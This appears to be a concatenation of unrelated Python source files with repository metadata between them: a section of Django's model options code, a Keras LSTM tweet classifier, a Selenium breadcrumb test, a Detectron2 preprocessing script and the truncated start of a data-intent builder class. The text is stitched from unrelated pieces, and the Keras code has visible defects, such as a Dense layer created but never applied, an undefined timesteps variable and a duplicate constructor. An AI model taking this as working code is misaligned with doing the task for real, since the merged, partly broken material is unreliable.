"set Meta.base_manager_name on '{}'.".format(self.model._meta.label),
RemovedInDjango20Warning, 2
)
if i == 0:
manager = self.default_manager
else:
manager = base_manager_class()
manager.name = '_base_manager'
manager.model = self.model
return manager
manager = Manager()
manager.name = '_base_manager'
manager.model = self.model
manager.auto_created = True
return manager
@cached_property
def default_manager(self):
default_manager_name = self.default_manager_name
if not default_manager_name and not self.local_managers:
# Get the first parent's default_manager_name if there's one.
for parent in self.model.mro()[1:]:
if hasattr(parent, '_meta'):
default_manager_name = parent._meta.default_manager_name
break
if default_manager_name:
try:
return self.managers_map[default_manager_name]
except KeyError:
raise ValueError(
"%s has no manager named %r" % (
self.object_name,
default_manager_name,
)
)
if self.managers:
return self.managers[0]
@cached_property
def fields(self):
"""
Returns a list of all forward fields on the model and its parents,
excluding ManyToManyFields.
Private API intended only to be used by Django itself; get_fields()
combined with filtering of field properties is the public API for
obtaining this field list.
"""
# For legacy reasons, the fields property should only contain forward
# fields that are not private or with a m2m cardinality. Therefore we
# pass these three filters as filters to the generator.
# The third lambda is a longwinded way of checking f.related_model - we don't
# use that property directly because related_model is a cached property,
# and all the models may not have been loaded yet; we don't want to cache
# the string reference to the related_model.
def is_not_an_m2m_field(f):
return not (f.is_relation and f.many_to_many)
def is_not_a_generic_relation(f):
return not (f.is_relation and f.one_to_many)
def is_not_a_generic_foreign_key(f):
return not (
f.is_relation and f.many_to_one and not (hasattr(f.remote_field, 'model') and f.remote_field.model)
)
return make_immutable_fields_list(
"fields",
(f for f in self._get_fields(reverse=False)
if is_not_an_m2m_field(f) and is_not_a_generic_relation(f) and is_not_a_generic_foreign_key(f))
)
@cached_property
def concrete_fields(self):
"""
Returns a list of all concrete fields on the model and its parents.
Private API intended only to be used by Django itself; get_fields()
combined with filtering of field properties is the public API for
obtaining this field list.
"""
return make_immutable_fields_list(
"concrete_fields", (f for f in self.fields if f.concrete)
)
@property
@warn_about_renamed_method(
'Options', 'virtual_fields', 'private_fields',
RemovedInDjango20Warning
)
def virtual_fields(self):
return self.private_fields
@cached_property
def local_concrete_fields(self):
"""
Returns a list of all concrete fields on the model.
Private API intended only to be used by Django itself; get_fields()
combined with filtering of field properties is the public API for
obtaining this field list.
"""
return make_immutable_fields_list(
"local_concrete_fields", (f for f in self.local_fields if f.concrete)
)
@cached_property
def many_to_many(self):
"""
Returns a list of all many to many fields on the model and its parents.
Private API intended only to be used by Django itself; get_fields()
combined with filtering of field properties is the public API for
obtaining this list.
"""
return make_immutable_fields_list(
"many_to_many",
(f for f in self._get_fields(reverse=False) if f.is_relation and f.many_to_many)
)
@cached_property
def related_objects(self):
"""
Returns all related objects pointing to the current model. The related
objects can come from a one-to-one, one-to-many, or many-to-many field
relation type.
Private API intended only to be used by Django itself; get_fields()
combined with filtering of field properties is the public API for
obtaining this field list.
"""
all_related_fields = self._get_fields(forward=False, reverse=True, include_hidden=True)
return make_immutable_fields_list(
"related_objects",
(obj for obj in all_related_fields if not obj.hidden or obj.field.many_to_many)
)
@cached_property
def _forward_fields_map(self):
res = {}
fields = self._get_fields(reverse=False)
for field in fields:
res[field.name] = field
# Due to the way Django's internals work, get_field() should also
# be able to fetch a field by attname. In the case of a concrete
# field with relation, includes the *_id name too
try:
res[field.attname] = field
except AttributeError:
pass
return res
@cached_property
def fields_map(self):
res = {}
fields = self._get_fields(forward=False, include_hidden=True)
for field in fields:
res[field.name] = field
# Due to the way Django's internals work, get_field() should also
# be able to fetch a field by attname. In the case of a concrete
# field with relation, includes the *_id name too
try:
res[field.attname] = field
except AttributeError:
pass
return res
def get_field(self, field_name):
"""
Return a field instance given the name of a forward or reverse field.
"""
try:
# In order to avoid premature loading of the relation tree
# (expensive) we prefer checking if the field is a forward field.
return self._forward_fields_map[field_name]
except KeyError:
# If the app registry is not ready, reverse fields are
# unavailable, therefore we throw a FieldDoesNotExist exception.
if not self.apps.models_ready:
raise FieldDoesNotExist(
"%s has no field named '%s'. The app cache isn't ready yet, "
"so if this is an auto-created related field, it won't "
"be available yet." % (self.object_name, field_name)
)
try:
# Retrieve field instance by name from cached or just-computed
# field map.
return self.fields_map[field_name]
except KeyError:
raise FieldDoesNotExist("%s has no field named '%s'" % (self.object_name, field_name))
def get_base_chain(self, model):
"""
Return a list of parent classes leading to `model` (ordered from
closest to most distant ancestor). This has to handle the case where
`model` is a grandparent or even more distant relation.
"""
if not self.parents:
return []
if model in self.parents:
return [model]
for parent in self.parents:
res = parent._meta.get_base_chain(model)
if res:
res.insert(0, parent)
return res
return []
def get_parent_list(self):
"""
Returns all the ancestors of this model as a list ordered by MRO.
Useful for determining if something is an ancestor, regardless of lineage.
"""
result = OrderedSet(self.parents)
for parent in self.parents:
for ancestor in parent._meta.get_parent_list():
result.add(ancestor)
return list(result)
def get_ancestor_link(self, ancestor):
"""
Returns the field on the current model which points to the given
"ancestor". This is possible an indirect link (a pointer to a parent
model, which points, eventually, to the ancestor). Used when
constructing table joins for model inheritance.
Returns None if the model isn't an ancestor of this one.
"""
if ancestor in self.parents:
return self.parents[ancestor]
for parent in self.parents:
# Tries to get a link field from the immediate parent
parent_link = parent._meta.get_ancestor_link(ancestor)
if parent_link:
# In case of a proxied model, the first link
# of the chain to the ancestor is that parent
# links
return self.parents[parent] or parent_link
def get_path_to_parent(self, parent):
"""
Return a list of PathInfos containing the path from the current
model to the parent model, or an empty list if parent is not a
parent of the current model.
"""
if self.model is parent:
return []
# Skip the chain of proxy to the concrete proxied model.
proxied_model = self.concrete_model
path = []
opts = self
for int_model in self.get_base_chain(parent):
if int_model is proxied_model:
opts = int_model._meta
else:
final_field = opts.parents[int_model]
targets = (final_field.remote_field.get_related_field(),)
opts = int_model._meta
path.append(PathInfo(final_field.model._meta, opts, targets, final_field, False, True))
return path
def get_path_from_parent(self, parent):
"""
Return a list of PathInfos containing the path from the parent
model to the current model, or an empty list if parent is not a
parent of the current model.
"""
if self.model is parent:
return []
model = self.concrete_model
# Get a reversed base chain including both the current and parent
# models.
chain = model._meta.get_base_chain(parent)
chain.reverse()
chain.append(model)
# Construct a list of the PathInfos between models in chain.
path = []
for i, ancestor in enumerate(chain[:-1]):
child = chain[i + 1]
link = child._meta.get_ancestor_link(ancestor)
path.extend(link.get_reverse_path_info())
return path
def _populate_directed_relation_graph(self):
"""
This method is used by each model to find its reverse objects. As this
method is very expensive and is accessed frequently (it looks up every
field in a model, in every app), it is computed on first access and then
is set as a property on every model.
"""
related_objects_graph = defaultdict(list)
all_models = self.apps.get_models(include_auto_created=True)
for model in all_models:
opts = model._meta
# Abstract model's fields are copied to child models, hence we will
# see the fields from the child models.
if opts.abstract:
continue
fields_with_relations = (
f for f in opts._get_fields(reverse=False, include_parents=False)
if f.is_relation and f.related_model is not None
)
for f in fields_with_relations:
if not isinstance(f.remote_field.model, six.string_types):
related_objects_graph[f.remote_field.model._meta.concrete_model._meta].append(f)
for model in all_models:
# Set the relation_tree using the internal __dict__. In this way
# we avoid calling the cached property. In attribute lookup,
# __dict__ takes precedence over a data descriptor (such as
# @cached_property). This means that the _meta._relation_tree is
# only called if related_objects is not in __dict__.
related_objects = related_objects_graph[model._meta.concrete_model._meta]
model._meta.__dict__['_relation_tree'] = related_objects
# It seems it is possible that self is not in all_models, so guard
# against that with default for get().
return self.__dict__.get('_relation_tree', EMPTY_RELATION_TREE)
@cached_property
def _relation_tree(self):
return self._populate_directed_relation_graph()
def _expire_cache(self, forward=True, reverse=True):
# This method is usually called by apps.cache_clear(), when the
# registry is finalized, or when a new field is added.
if forward:
for cache_key in self.FORWARD_PROPERTIES:
if cache_key in self.__dict__:
delattr(self, cache_key)
if reverse and not self.abstract:
for cache_key in self.REVERSE_PROPERTIES:
if cache_key in self.__dict__:
delattr(self, cache_key)
self._get_fields_cache = {}
def get_fields(self, include_parents=True, include_hidden=False):
"""
Returns a list of fields associated to the model. By default, includes
forward and reverse fields, fields derived from inheritance, but not
hidden fields. The returned fields can be changed using the parameters:
- include_parents: include fields derived from inheritance
- include_hidden: include fields that have a related_name that
starts with a "+"
"""
if include_parents is False:
include_parents = PROXY_PARENTS
return self._get_fields(include_parents=include_parents, include_hidden=include_hidden)
def _get_fields(self, forward=True, reverse=True, include_parents=True, include_hidden=False,
seen_models=None):
"""
Internal helper function to return fields of the model.
* If forward=True, then fields defined on this model are returned.
* If reverse=True, then relations pointing to this model are returned.
* If include_hidden=True, then fields with is_hidden=True are returned.
* The include_parents argument toggles if fields from parent models
should be included. It has three values: True, False, and
PROXY_PARENTS. When set to PROXY_PARENTS, the call will return all
fields defined for the current model or any of its parents in the
parent chain to the model's concrete model.
"""
if include_parents not in (True, False, PROXY_PARENTS):
raise TypeError("Invalid argument for include_parents: %s" % (include_parents,))
# This helper function is used to allow recursion in ``get_fields()``
# implementation and to provide a fast way for Django's internals to
# access specific subsets of fields.
# We must keep track of which models we have already seen. Otherwise we
# could include the same field multiple times from different models.
topmost_call = False
if seen_models is None:
seen_models = set()
topmost_call = True
seen_models.add(self.model)
# Creates a cache key composed of all arguments
cache_key = (forward, reverse, include_parents, include_hidden, topmost_call)
try:
# In order to avoid list manipulation. Always return a shallow copy
# of the results.
return self._get_fields_cache[cache_key]
except KeyError:
pass
fields = []
# Recursively call _get_fields() on each parent, with the same
# options provided in this call.
if include_parents is not False:
for parent in self.parents:
# In diamond inheritance it is possible that we see the same
# model from two different routes. In that case, avoid adding
# fields from the same parent again.
if parent in seen_models:
continue
if (parent._meta.concrete_model != self.concrete_model and
include_parents == PROXY_PARENTS):
continue
for obj in parent._meta._get_fields(
forward=forward, reverse=reverse, include_parents=include_parents,
include_hidden=include_hidden, seen_models=seen_models):
if getattr(obj, 'parent_link', False) and obj.model != self.concrete_model:
continue
fields.append(obj)
if reverse and not self.proxy:
# Tree is computed once and cached until the app cache is expired.
# It is composed of a list of fields pointing to the current model
# from other models.
all_fields = self._relation_tree
for field in all_fields:
# If hidden fields should be included or the relation is not
# intentionally hidden, add to the fields dict.
if include_hidden or not field.remote_field.hidden:
fields.append(field.remote_field)
if forward:
fields.extend(
field for field in chain(self.local_fields, self.local_many_to_many)
)
# Private fields are recopied to each child model, and they get a
# different model as field.model in each child. Hence we have to
# add the private fields separately from the topmost call. If we
# did this recursively similar to local_fields, we would get field
# instances with field.model != self.model.
if topmost_call:
fields.extend(
f for f in self.private_fields
)
# In order to avoid list manipulation. Always
# return a shallow copy of the results
fields = make_immutable_fields_list("get_fields()", fields)
# Store result into cache for later access
self._get_fields_cache[cache_key] = fields
return fields
@property
def has_auto_field(self):
warnings.warn(
'Model._meta.has_auto_field is deprecated in favor of checking if '
'Model._meta.auto_field is not None.',
RemovedInDjango21Warning, stacklevel=2
)
return self.auto_field is not None
@has_auto_field.setter
def has_auto_field(self, value):
pass
@cached_property
def _property_names(self):
"""Return a set of the names of the properties defined on the model."""
names = []
for name in dir(self.model):
try:
attr = getattr(self.model, name)
except AttributeError:
pass
else:
if isinstance(attr, property):
names.append(name)
return frozenset(names)
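# Hedged illustration (editor addition, not part of Django): normalize_together(),
# defined near the top of this module, accepts either a single pair or a tuple of
# tuples and always normalizes to the nested form, e.g.
#   normalize_together(('first_name', 'last_name'))  ->  (('first_name', 'last_name'),)
#   normalize_together([('a', 'b'), ('c', 'd')])      ->  (('a', 'b'), ('c', 'd'))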
|
[
"ingabineza@gmail.com"
] |
ingabineza@gmail.com
|
e9aea849891f25c699869356243ba071ec8daf04
|
3aabf076ca0f31c69948ccb34151488bec6e1e3e
|
/terra/classifier.py
|
16ead567f316c48b3749cc50ebe244812ab24d0c
|
[
"MIT"
] |
permissive
|
siddharthvaria/GI-DL
|
2e4af5dada42cefaa8e19137963b0a4675025011
|
715b5fe4426d737ed1b23ffbb812058a90433682
|
refs/heads/master
| 2021-09-14T16:07:41.572158
| 2018-05-15T22:39:20
| 2018-05-15T22:39:20
| 94,111,739
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,968
|
py
|
from keras.models import Model, load_model
from keras.layers import Input, LSTM, Dense, RepeatVector
# autoencoder/encoder + classifier for tweets
class Classifier:
def __init__(self, timesteps, input_dim=1, latent_dim=100,
elayers=3, dlayers=3, clayers=3):
ainputs = Input(shape=(timesteps, input_dim))
cinputs = Input(shape=(timesteps, input_dim))
# create encoding subnet
encoded = LSTM(latent_dim, return_sequences=True)
# for l in range(1, elayers):
# encoded = LSTM(latent_dim)(encoded)
# create decoding subnet
decoded = RepeatVector(timesteps)(LSTM(latent_dim)(encoded(ainputs)))
decoded = LSTM(input_dim, return_sequences=True)(decoded)
# for l in range(1, dlayers):
# decoded = LSTM(input_dim, return_sequences=True)(decoded)
# set up autoencoder model
self.autoencoder = Model(ainputs, decoded)
# create and set up classifier
classified = LSTM(128)(encoded(cinputs))
# for l in range(1, clayers):
# classified = LSTM(128)(classified)
        classified = Dense(3, activation='softmax')(classified)  # apply the layer to the encoded sequence (left unapplied in the original)
self.classifier = Model(cinputs, classified)
# compile models
self.autoencoder.compile(loss='binary_crossentropy',
optimizer='adam')
self.classifier.compile(loss='categorical_crossentropy',
optimizer='adam')
# def __init__(self, auto, classif):
# self.autoencoder = load_model(auto)
# self.classifier = load_model(classif)
def save(self, auto_out, classif_out):
self.autoencoder.save_weights(auto_out)
self.classifier.save_weights(classif_out)
    def fit_auto(self, X):
        self.autoencoder.fit(X, X)
    def fit_classif(self, X, y):
        self.classifier.fit(X, y)
    def evaluate(self, X, y):
        return self.classifier.evaluate(X, y)
    def predict(self, X):
        return self.classifier.predict(X)
# a variational version
# TODO: make variational!
class VClassifier:
def __init__(self, batch_size,
input_dim=1, intermediate_dim=50, latent_dim=100,
elayers=3, dlayers=3, clayers=3):
        # NOTE: `timesteps` is referenced below but is not a parameter of this
        # __init__ (kept as in the original; the class is flagged as a TODO above).
        ainputs = Input(shape=(timesteps, input_dim))
cinputs = Input(shape=(timesteps, input_dim))
# create encoding subnet
encoded = LSTM(latent_dim)
for l in range(1, elayers):
encoded = LSTM(latent_dim)(encoded)
# create decoding subnet
decoded = RepeatVector(timesteps)(encoded(ainputs))
decoded = LSTM(input_dim, return_sequences=True)(decoded)
for l in range(1, dlayers):
decoded = LSTM(input_dim, return_sequences=True)(decoded)
# set up autoencoder model
self.autoencoder = Model(ainputs, decoded)
# create and set up classifier
classified = LSTM(128)(encoded(cinputs))
for l in range(1, clayers):
classified = LSTM(128)(classified)
        classified = Dense(3, activation='softmax')(classified)  # apply the layer (left unapplied in the original)
self.classifier = Model(cinputs, classified)
# compile models
self.autoencoder.compile(loss='binary_crossentropy',
optimizer='adam')
self.classifier.compile(loss='categorical_crossentropy',
optimizer='adam')
    # NOTE: this second __init__ overrides the constructor above, so as written the
    # class can only be built from saved models; kept as in the original.
    def __init__(self, auto, classif):
self.autoencoder = load_model(auto)
self.classifier = load_model(classif)
def save(self, auto_out, classif_out):
self.autoencoder.save_weights(auto_out)
self.classifier.save_weights(classif_out)
    def fit_auto(self, X):
        self.autoencoder.fit(X, X)
    def fit_classif(self, X, y):
        self.classifier.fit(X, y)
    def evaluate(self, X, y):
        return self.classifier.evaluate(X, y)
    def predict(self, X):
        return self.classifier.predict(X)
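# Hedged usage sketch (editor addition, not part of the original file): builds the
# non-variational Classifier on toy data to show the expected tensor shapes; the
# sizes below are assumptions for illustration only.
if __name__ == '__main__':
    import numpy as np
    clf = Classifier(timesteps=20, input_dim=1, latent_dim=16)
    X = np.random.random((8, 20, 1))            # 8 sequences, 20 timesteps, 1 feature
    y = np.eye(3)[np.random.randint(0, 3, 8)]   # one-hot labels over 3 classes
    clf.fit_auto(X)
    clf.fit_classif(X, y)
    print(clf.predict(X).shape)                 # expected: (8, 3)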
|
[
"fl2301@columbia.edu"
] |
fl2301@columbia.edu
|
6fc2e9842a862e151818555c40bd68c1fe986ae7
|
aa5d98396184ab9dc479075b37a3664c385de027
|
/tests/selenium/breadcrumb_test.py
|
8ae1041e04352b0b8d70180fdda1d4cfface3872
|
[
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
uk-gov-mirror/ONSdigital.sbr-ui
|
c6a66cd6982e9e98a991eadbb8cef0f1fb6ba2bf
|
48bbfdc59e393dd4d2d008b8414ac96d2e2be44f
|
refs/heads/master
| 2021-10-12T00:02:34.160448
| 2018-10-17T14:59:04
| 2018-10-17T14:59:04
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,910
|
py
|
import unittest
from selenium import webdriver
from tests.helper_methods import create_selenium_config
from tests.constants import BASE_URL, SEARCH_URL
from tests.constants import ENTERPRISE, LOCAL_UNIT, REPORTING_UNIT, LEGAL_UNIT, COMPANY_HOUSE, VALUE_ADDED_TAX, PAY_AS_YOU_EARN
from tests.constants import BREADCRUMB_SEARCH_ID, BREADCRUMB_SELECTED_ID, BREADCRUMB_ENT_ID, BREADCRUMB_LEU_ID
from tests.constants import SEARCH_BUTTON_ID, PERIOD_INPUT_ID, UNIT_TYPE_INPUT_ID
from tests.constants import USERNAME_INPUT_ID, PASSWORD_INPUT_ID, SEARCH_INPUT_ID, LOGIN_BUTTON_ID, LOGOUT_BUTTON_ID
from tests.constants import ERN, UBRN, RURN, LURN, VATREF, PAYEREF, CRN, PERIOD
from tests.constants import ADMIN_USERNAME, ADMIN_PASSWORD
class BreadcrumbTest(unittest.TestCase):
"""
The breadcrumb is present on each unit page and allows navigation up the unit hierarchy.
TODO: test for when a breadcrumb link returns 404/500
"""
def setUp(self):
self.options = create_selenium_config()
self.driver = webdriver.Firefox(firefox_options=self.options)
self.driver.get(BASE_URL)
self.driver.find_element_by_id(USERNAME_INPUT_ID).send_keys(ADMIN_USERNAME)
self.driver.find_element_by_id(PASSWORD_INPUT_ID).send_keys(ADMIN_PASSWORD)
self.driver.find_element_by_id(LOGIN_BUTTON_ID).click()
def tearDown(self):
self.driver.find_element_by_id(LOGOUT_BUTTON_ID).click()
self.driver.quit()
def search_by_unit_id_type_period(self, unit_id, unit_type, period):
self.driver.find_element_by_id(SEARCH_INPUT_ID).send_keys(unit_id)
self.driver.find_element_by_id(UNIT_TYPE_INPUT_ID).send_keys(unit_type)
self.driver.find_element_by_id(PERIOD_INPUT_ID).send_keys(period)
self.driver.find_element_by_id(SEARCH_BUTTON_ID).click()
def assert_breadcrumb_item_text_and_url(self, breadcrumb_id, unit_id, unit_type, period):
breadcrumb_item = self.driver.find_element_by_id(breadcrumb_id)
self.assertEqual(breadcrumb_item.text, f'{unit_type} - {unit_id}')
target_url = f'{SEARCH_URL}/periods/{period}/types/{unit_type}/units/{unit_id}'
self.assertEqual(breadcrumb_item.get_attribute('href'), target_url)
def assert_current_breadcrumb_item_text(self, expected_text):
current_item_text = self.driver.find_element_by_id(BREADCRUMB_SELECTED_ID).text
self.assertEqual(current_item_text, expected_text)
def assert_breadcrumb_search_href(self):
href = self.driver.find_element_by_id(BREADCRUMB_SEARCH_ID).get_attribute('href')
self.assertEqual(href, SEARCH_URL)
def test_ent_breadcrumb(self):
self.search_by_unit_id_type_period(ERN, ENTERPRISE, '201810')
self.assertEqual(self.driver.current_url, f'{SEARCH_URL}/periods/{PERIOD}/types/{ENTERPRISE}/units/{ERN}')
self.assert_breadcrumb_search_href()
self.assert_current_breadcrumb_item_text(f'ENT - {ERN}')
def test_lou_breadcrumb(self):
self.search_by_unit_id_type_period(LURN, LOCAL_UNIT, '201810')
self.assertEqual(self.driver.current_url, f'{SEARCH_URL}/periods/{PERIOD}/types/{LOCAL_UNIT}/units/{LURN}')
self.assert_breadcrumb_search_href()
self.assert_current_breadcrumb_item_text(f'LOU - {LURN}')
self.assert_breadcrumb_item_text_and_url(BREADCRUMB_ENT_ID, ERN, ENTERPRISE, PERIOD)
def test_reu_breadcrumb(self):
self.search_by_unit_id_type_period(RURN, REPORTING_UNIT, '201810')
self.assertEqual(self.driver.current_url, f'{SEARCH_URL}/periods/{PERIOD}/types/{REPORTING_UNIT}/units/{RURN}')
self.assert_breadcrumb_search_href()
self.assert_current_breadcrumb_item_text(f'REU - {RURN}')
self.assert_breadcrumb_item_text_and_url(BREADCRUMB_ENT_ID, ERN, ENTERPRISE, PERIOD)
def test_leu_breadcrumb(self):
self.search_by_unit_id_type_period(UBRN, LEGAL_UNIT, '201810')
self.assertEqual(self.driver.current_url, f'{SEARCH_URL}/periods/{PERIOD}/types/{LEGAL_UNIT}/units/{UBRN}')
self.assert_breadcrumb_search_href()
self.assert_current_breadcrumb_item_text(f'LEU - {UBRN}')
self.assert_breadcrumb_item_text_and_url(BREADCRUMB_ENT_ID, ERN, ENTERPRISE, PERIOD)
def test_ch_breadcrumb(self):
self.search_by_unit_id_type_period(CRN, COMPANY_HOUSE, '201810')
self.assertEqual(self.driver.current_url, f'{SEARCH_URL}/periods/{PERIOD}/types/{COMPANY_HOUSE}/units/{CRN}')
self.assert_breadcrumb_search_href()
self.assert_current_breadcrumb_item_text(f'CRN - {CRN}')
self.assert_breadcrumb_item_text_and_url(BREADCRUMB_ENT_ID, ERN, ENTERPRISE, PERIOD)
self.assert_breadcrumb_item_text_and_url(BREADCRUMB_LEU_ID, UBRN, LEGAL_UNIT, PERIOD)
def test_vat_breadcrumb(self):
self.search_by_unit_id_type_period(VATREF, VALUE_ADDED_TAX, '201810')
self.assertEqual(self.driver.current_url, f'{SEARCH_URL}/periods/{PERIOD}/types/{VALUE_ADDED_TAX}/units/{VATREF}')
self.assert_breadcrumb_search_href()
self.assert_current_breadcrumb_item_text(f'VAT - {VATREF}')
self.assert_breadcrumb_item_text_and_url(BREADCRUMB_ENT_ID, ERN, ENTERPRISE, PERIOD)
self.assert_breadcrumb_item_text_and_url(BREADCRUMB_LEU_ID, UBRN, LEGAL_UNIT, PERIOD)
def test_paye_breadcrumb(self):
self.search_by_unit_id_type_period(PAYEREF, PAY_AS_YOU_EARN, '201810')
self.assertEqual(self.driver.current_url, f'{SEARCH_URL}/periods/{PERIOD}/types/{PAY_AS_YOU_EARN}/units/{PAYEREF}')
self.assert_breadcrumb_search_href()
self.assert_current_breadcrumb_item_text(f'PAYE - {PAYEREF}')
self.assert_breadcrumb_item_text_and_url(BREADCRUMB_ENT_ID, ERN, ENTERPRISE, PERIOD)
self.assert_breadcrumb_item_text_and_url(BREADCRUMB_LEU_ID, UBRN, LEGAL_UNIT, PERIOD)
if __name__ == '__main__':
unittest.main()
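# Hedged note (editor addition): the suite above uses plain unittest, so it can be
# run directly, e.g. `python -m unittest tests.selenium.breadcrumb_test`, provided
# geckodriver and the constants/credentials modules are available (assumption).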
|
[
"noreply@github.com"
] |
uk-gov-mirror.noreply@github.com
|
bd05dc4876b69bf2451ecc467039d32ee79a19ed
|
0862376b2318c42efa3498dda41c73ecbdbf2ac3
|
/scripts/preprocess.py
|
54077b0a7f0cb04a4a1eee90e1322e2d46f140c6
|
[] |
no_license
|
njkbarry/context-rcnn-d2
|
96e2f9a0dbbe4a2b54bce403e5f4d0054aa46509
|
c3e1f6b208962334763c3364dc107387a2bc3e94
|
refs/heads/main
| 2023-04-06T17:02:13.536520
| 2021-04-06T18:03:56
| 2021-04-06T18:03:56
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,024
|
py
|
import argparse
import os
import torch.multiprocessing as mp
from detectron2.config import get_cfg
from detectron2.engine import default_setup
from context_rcnn.config import add_context_rcnn_config
from context_rcnn.preprocess import build_banks, build_one_bank
# relative to models-dir
_MODELS = {
# 1-class model
"frcnn-r101-cct": {
"weights": "pretrained/cct-animal-frcnn-r101/model_final_wo_solver_states.pth",
"config": "pretrained/cct-animal-frcnn-r101/config.yaml"
},
# toy model undertrained on just toy1924-species
"toy-fpn": {
"weights": "toy1924-multi-18epoch-fpn/model_final.pth",
"config": "toy1924-multi-18epoch-fpn/config.yaml"
},
# toy model undertrained on just toy1924-species
"toy-c4": {
"weights": "toy1924-multi-18epoch-c4/model_final.pth",
"config": "toy1924-multi-18epoch-c4/config.yaml"
},
}
def get_cfg_for_inference(model_name, models_dir, score_threshold=0.0, nms_threshold=0.5):
weights = os.path.join(models_dir, _MODELS[model_name]["weights"])
config = os.path.join(models_dir, _MODELS[model_name]["config"])
cfg = get_cfg()
add_context_rcnn_config(cfg)
cfg.merge_from_file(config)
cfg.MODEL.WEIGHTS = weights
cfg.MODEL.ROI_HEADS.SCORE_THRESH_TEST = score_threshold
cfg.MODEL.ROI_HEADS.NMS_THRESH_TEST = nms_threshold
return cfg
def preprocess_argument_parser():
parser = argparse.ArgumentParser()
parser.add_argument("--model", default="frcnn-r101-cct", help="Name of model to use for inference. See _MODELS")
parser.add_argument("--dataset", default="cct", help="Name of dataset to generate banks for, { 'cct' }")
parser.add_argument("--banks-dir", default="./banks", metavar="FILE", help="Location of memory banks for Context R-CNN")
parser.add_argument("--data-dir", default="../data", metavar="FILE", help="Path to data/")
parser.add_argument("--models-dir", default="../models", metavar="FILE", help="Path to models/")
parser.add_argument("--num-gpus", type=int, default=1)
parser.add_argument("--only", default=None, help="only do the specified bank")
return parser
def build_banks_with_process(gpu_idx, cfg, dataset_name, data_dir, bank_dir, num_gpus):
"""Same as context_rcnn.preprocess but ignores process ID from torch multiprocessing."""
cfg = cfg.clone()
cfg.MODEL.DEVICE = "cuda:{}".format(gpu_idx)
default_setup(cfg, {})
print("Launching process on GPU", gpu_idx)
build_banks(cfg, dataset_name, data_dir, bank_dir, gpu_idx, num_gpus)
if __name__ == "__main__":
args = preprocess_argument_parser().parse_args()
cfg = get_cfg_for_inference(args.model, args.models_dir)
if args.only:
build_one_bank(cfg, args.dataset, args.data_dir, args.banks_dir, args.only, in_train=True)
else:
mp.spawn(build_banks_with_process, args=(cfg, args.dataset, args.data_dir, args.banks_dir, args.num_gpus),
nprocs=args.num_gpus)
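# Hedged usage sketch (editor addition): a single-GPU invocation matching the
# argparse flags defined above; the relative paths are assumptions.
#
#   python scripts/preprocess.py --model frcnn-r101-cct --dataset cct \
#       --data-dir ../data --banks-dir ./banks --num-gpus 1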
|
[
"justinkay92@gmail.com"
] |
justinkay92@gmail.com
|
4e5e39b356cbb7a91503ee349dcc94df9ee9b50b
|
d6dfbd6251ee3f75d0f304930b406d8504f52f9d
|
/ds_discovery/intent/abstract_builder_intent.py
|
d1c46ba84752536a1d383292b0e10a73abbc1299
|
[
"BSD-3-Clause"
] |
permissive
|
bpandey-CS/discovery-transition-ds
|
974fd5e4bd99ec0993ffe23530e17413ba50c59a
|
08229ca3b7617b42ce2dd8e47ff93876c0843810
|
refs/heads/master
| 2023-05-31T03:20:07.185204
| 2021-06-29T16:35:59
| 2021-06-29T16:35:59
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 131,319
|
py
|
import ast
import time
import numpy as np
import pandas as pd
from copy import deepcopy
from typing import Any
from matplotlib import dates as mdates
from scipy import stats
from aistac.components.aistac_commons import DataAnalytics
from ds_discovery.components.transitioning import Transition
from ds_discovery.components.commons import Commons
from aistac.properties.abstract_properties import AbstractPropertyManager
from ds_discovery.components.discovery import DataDiscovery
from ds_discovery.intent.abstract_common_intent import AbstractCommonsIntentModel
__author__ = 'Darryl Oatridge'
class AbstractBuilderIntentModel(AbstractCommonsIntentModel):
_INTENT_PARAMS = ['self', 'save_intent', 'column_name', 'intent_order',
'replace_intent', 'remove_duplicates', 'seed']
def __init__(self, property_manager: AbstractPropertyManager, default_save_intent: bool=None,
default_intent_level: [str, int, float]=None, default_intent_order: int=None,
default_replace_intent: bool=None):
"""initialisation of the Intent class.
:param property_manager: the property manager class that references the intent contract.
:param default_save_intent: (optional) The default action for saving intent in the property manager
:param default_intent_level: (optional) the default level intent should be saved at
:param default_intent_order: (optional) if the default behaviour for the order should be next available order
:param default_replace_intent: (optional) the default replace existing intent behaviour
"""
default_save_intent = default_save_intent if isinstance(default_save_intent, bool) else True
default_replace_intent = default_replace_intent if isinstance(default_replace_intent, bool) else True
default_intent_level = default_intent_level if isinstance(default_intent_level, (str, int, float)) else 'A'
default_intent_order = default_intent_order if isinstance(default_intent_order, int) else 0
intent_param_exclude = ['size']
intent_type_additions = [np.int8, np.int16, np.int32, np.int64, np.float32, np.float64, pd.Timestamp]
super().__init__(property_manager=property_manager, default_save_intent=default_save_intent,
intent_param_exclude=intent_param_exclude, default_intent_level=default_intent_level,
default_intent_order=default_intent_order, default_replace_intent=default_replace_intent,
intent_type_additions=intent_type_additions)
def run_intent_pipeline(self, canonical: Any=None, intent_levels: [str, int, list]=None, run_book: str=None,
seed: int=None, simulate: bool=None, **kwargs) -> pd.DataFrame:
"""Collectively runs all parameterised intent taken from the property manager against the code base as
defined by the intent_contract. The whole run can be seeded, though any parameterised seeding in the intent
contracts will take precedence
:param canonical: a direct or generated pd.DataFrame. see context notes below
:param intent_levels: (optional) a single or list of intent_level to run in order given
:param run_book: (optional) a preset runbook of intent_level to run in order
:param seed: (optional) a seed value that will be applied across the run: default to None
:param simulate: (optional) returns a report of the order of run and return the indexed column order of run
:return: a pandas dataframe
"""
simulate = simulate if isinstance(simulate, bool) else False
col_sim = {"column": [], "order": [], "method": []}
# legacy
if 'size' in kwargs.keys():
canonical = kwargs.pop('size')
canonical = self._get_canonical(canonical)
size = canonical.shape[0] if canonical.shape[0] > 0 else 1000
# test if there is any intent to run
if self._pm.has_intent():
# get the list of levels to run
if isinstance(intent_levels, (str, list)):
column_names = Commons.list_formatter(intent_levels)
elif isinstance(run_book, str) and self._pm.has_run_book(book_name=run_book):
column_names = self._pm.get_run_book(book_name=run_book)
else:
# put all the intent in order of frame_starter, get, model, correlate, frame_end
_model = []
_get = []
_correlate = []
_frame_start = []
_frame_end = []
for column in self._pm.get_intent().keys():
for order in self._pm.get(self._pm.join(self._pm.KEY.intent_key, column), {}):
for method in self._pm.get(self._pm.join(self._pm.KEY.intent_key, column, order), {}).keys():
